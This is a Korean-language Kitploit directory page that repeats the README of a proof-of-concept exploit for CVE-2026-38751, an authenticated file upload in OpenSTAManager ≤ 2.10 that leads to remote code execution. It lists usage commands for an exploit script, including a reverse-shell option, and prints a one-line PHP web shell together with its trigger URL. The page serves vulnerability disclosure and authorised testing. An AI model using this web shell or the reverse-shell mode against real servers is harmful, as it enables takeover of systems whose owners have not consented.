Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-38751-OpenSTAManager-Arbitrary-File-Upload-PoC — 이 저장소에는 OpenSTAManager ≤ 2.10에 영향을 미치는 CVE-2026-38751에 대한 개념 증명(PoC) 익스플로잇이 포함되어 있습니다. 이 취약점으로 인해 인증된 공격자가 모듈 업데이트 기능을 통해 악성 모듈을 업로드할 수 있으며, 이는 임의 파일 업로드 및 원격 코드 실행(RCE)으로 이어집니다. | Kitploit
도구/GitHubGitHub/mkps/cve-2026-38751-openstamanager-arbitrary-file-upload-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubmkps/cve-2026-38751-openstamanager-arbitrary-file-upload-poc

CVE-2026-38751-OpenSTAManager-Arbitrary-File-Upload-PoC

이 저장소에는 OpenSTAManager ≤ 2.10에 영향을 미치는 CVE-2026-38751에 대한 개념 증명(PoC) 익스플로잇이 포함되어 있습니다. 이 취약점으로 인해 인증된 공격자가 모듈 업데이트 기능을 통해 악성 모듈을 업로드할 수 있으며, 이는 임의 파일 업로드 및 원격 코드 실행(RCE)으로 이어집니다.

저장소 보기
12개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-38751 – OpenSTAManager 임의 파일 업로드 (PoC)

이 저장소는 OpenSTAManager ≤ 2.10에 영향을 미치는 CVE-2026-38751에 대한 개념 증명(PoC) 익스플로잇을 포함합니다. 이 취약점은 인증된 공격자가 모듈 업데이트 기능을 통해 악성 모듈을 업로드하여 임의 파일 업로드 및 원격 코드 실행(RCE)을 유발할 수 있게 합니다.

CVE 참조

  • MITRE CVE 항목(최초 공개 기록): https://www.cve.org/CVERecord?id=CVE-2026-38751
  • NVD(NIST) 취약점 데이터베이스: https://nvd.nist.gov/vuln/detail/CVE-2026-38751
  • GitHub Advisory Database https://github.com/advisories/GHSA-rm34-fg4m-39mw

영향을 받는 소프트웨어

  • OpenSTAManager ≤ 2.10
  • 모듈 업데이트 시스템 (modules/aggiornamenti/upload_modules.php)

취약점 설명

모듈 업데이트 기능은 인증된 사용자가 파일 내용 또는 실행 경계에 대한 적절한 검증 없이 ZIP 기반 모듈을 업로드할 수 있게 합니다. 공격자는 PHP 페이로드를 포함하는 악성 모듈을 제작할 수 있으며, 해당 페이로드는 웹 루트에 배포된 후 애플리케이션 컨텍스트를 통해 실행됩니다. 그 결과 다음과 같은 문제가 발생합니다:

  • 임의 파일 업로드 (CWE-434)
  • 업로드된 PHP 파일을 통한 원격 코드 실행
  • 애플리케이션 컨텍스트의 완전한 장악

공격 흐름 (개략)

  1. OpenSTAManager에 인증
  2. 제작된 모듈 ZIP 아카이브 업로드
  3. 모듈 설치/업데이트 프로세스 트리거
  4. 웹 루트를 통해 업로드된 PHP 페이로드 접근
  5. 서버에서 임의 명령 실행

##영향 성공적인 악용 시 다음이 가능합니다:

  • 원격 명령 실행
  • 웹 서버 장악
  • 데이터 유출
  • 권한에 따른 전체 애플리케이션 탈취

요구 사항

  • 유효한 인증 사용자 계정
  • 모듈 업데이트 기능에 대한 접근 권한 활성화

사용법 (PoC)

  1. 악성 모듈 생성
root@kitploit:~
python exploit.py --build

생성 결과:

root@kitploit:~
update.zip
└── run/
    ├── MODULE
    └── evil.php
  1. 익스플로잇 실행
root@kitploit:~
python exploit.py <username> <password> <target_url>

리버스 셸 모드(선택 사항):

root@kitploit:~
python exploit.py <username> <password> <target_url> --lhost <IP> --lport <PORT>

예제 페이로드

root@kitploit:~
<?php
isset($_GET['cmd']) && system($_GET['cmd']);
?>

검증

성공하면 다음 엔드포인트에서 시스템 명령을 실행합니다: /modules/run/evil.php?cmd=id

MITRE / NVD 참조

  • MITRE CVE 기록: https://www.cve.org/CVERecord?id=CVE-2026-38751
  • NVD 항목: https://nvd.nist.gov/vuln/detail/CVE-2026-38751

면책 조항

이 프로젝트는 다음을 위한 것입니다:

  • 교육 목적
  • 승인된 보안 테스트
  • 연구 환경

명시적 허가 없이 시스템에 사용하지 마십시오.

참고

서버 구성에 따라 탐지 결과가 다를 수 있습니다. 일부 배포 환경에서는 모듈 디렉터리에서 직접 PHP 실행을 비활성화할 수 있습니다. 모듈 활성화 타이밍에 따라 재시도가 필요할 수 있습니다.

감사의 말

  • MITRE CVE 프로그램
  • NIST 국가 취약점 데이터베이스(NVD)
  • OpenSTAManager 프로젝트 유지 관리자
  • https://github.com/fuutianyii/poc (최초 PoC)
도구 다운로드